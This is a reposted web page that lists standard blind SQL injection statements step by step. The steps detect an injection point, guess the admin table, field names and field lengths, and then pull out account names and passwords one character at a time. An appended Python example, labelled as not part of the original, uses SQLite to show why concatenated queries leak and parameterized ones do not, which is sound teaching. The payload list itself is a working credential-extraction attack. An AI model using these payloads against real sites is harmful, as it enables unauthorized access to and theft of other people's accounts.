Standard SQL injection Statements

Source: Internet
Author: User
Tags sql injection

1. Determine if there are any injection points
; and 1=1 and 1=2


2. Guess the table name. It is usually nothing more than admin, adminuser, user, pass, password and so on.
and 0<>(SELECT COUNT(*) from *)
and 0<>(SELECT COUNT(*) from admin) -- Determine whether the admin table exists

3. Guess the number of accounts. If 0< returns the correct page and 1< returns the error page, the number of accounts is 1.
and 0<(SELECT COUNT(*) from admin)
and 1<(SELECT COUNT(*) from admin)

4. Guess the field name: put the field name we think of inside the Len() parentheses.
and 1=(SELECT COUNT(*) from admin where Len(*)>0)--
and 1=(SELECT COUNT(*) from admin where Len(name)>0) -- user field name: name
and 1=(SELECT COUNT(*) from admin where Len(password)>0) -- password field name: password

5. Guess the length of each field: keep changing the >0 value until the correct page is returned.
and 1=(SELECT COUNT(*) from admin where Len(*)>0)
and 1=(SELECT COUNT(*) from admin where Len(name)>6) -- error
and 1=(SELECT COUNT(*) from admin where Len(name)>5) -- correct, so the length is 6
and 1=(SELECT COUNT(*) from admin where Len(name)=6) -- correct

and 1=(SELECT COUNT(*) from admin where Len(password)>11) -- correct
and 1=(SELECT COUNT(*) from admin where Len(password)>12) -- error, so the length is 12
and 1=(SELECT COUNT(*) from admin where Len(password)=12) -- correct

6. Guessing characters
and 1=(SELECT COUNT(*) from admin where left(name,1)='a') -- Guess the first character of the user account
and 1=(SELECT COUNT(*) from admin where left(name,2)='ab') -- Guess the second character of the user account
Add one character at a time in this way. Once you have guessed as many characters as the length found above, the account name is complete.
and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51)--
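
Why the probes from steps 1 and 2 change the returned page, and why binding the parameter stops them, shown as an added example that is not part of the original page. The `news` table, the sample rows and the function names are constructed for illustration, and SQLite stands in for the Access/SQL Server back end the statements above are written for.

```python
import sqlite3

def make_db():
    # Constructed sample data: one article table plus the admin table from the page.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO news VALUES (1, 'hello');
        CREATE TABLE admin (name TEXT, password TEXT);
        INSERT INTO admin VALUES ('abcdef', '123456789012');
    """)
    return db

def page_vulnerable(db, id_param):
    # Weak form: the request parameter is concatenated into the statement,
    # so anything after the number is parsed as SQL.
    try:
        rows = db.execute("SELECT title FROM news WHERE id = " + id_param).fetchall()
    except sqlite3.Error:
        return "error"
    return "correct" if rows else "error"

def page_hardened(db, id_param):
    # Corrected form: validate the type, then bind the value as a parameter.
    try:
        value = int(id_param)
    except ValueError:
        return "rejected"
    rows = db.execute("SELECT title FROM news WHERE id = ?", (value,)).fetchall()
    return "correct" if rows else "error"

def compare(db, probes):
    # Map each probe to (vulnerable result, hardened result).
    return {p: (page_vulnerable(db, p), page_hardened(db, p)) for p in probes}

if __name__ == "__main__":
    probes = ["1", "1 and 1=1", "1 and 1=2",
              "1 and 0<>(select count(*) from admin)",
              "1 and 0<>(select count(*) from nosuchtable)"]
    for probe, result in compare(make_db(), probes).items():
        print(f"{probe!r:50} vulnerable={result[0]:8} hardened={result[1]}")
```

The concatenated handler answers "correct" or "error" depending on whether the appended condition is true, which is the signal every step on this page relies on; the bound handler gives the same answer for every probe.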
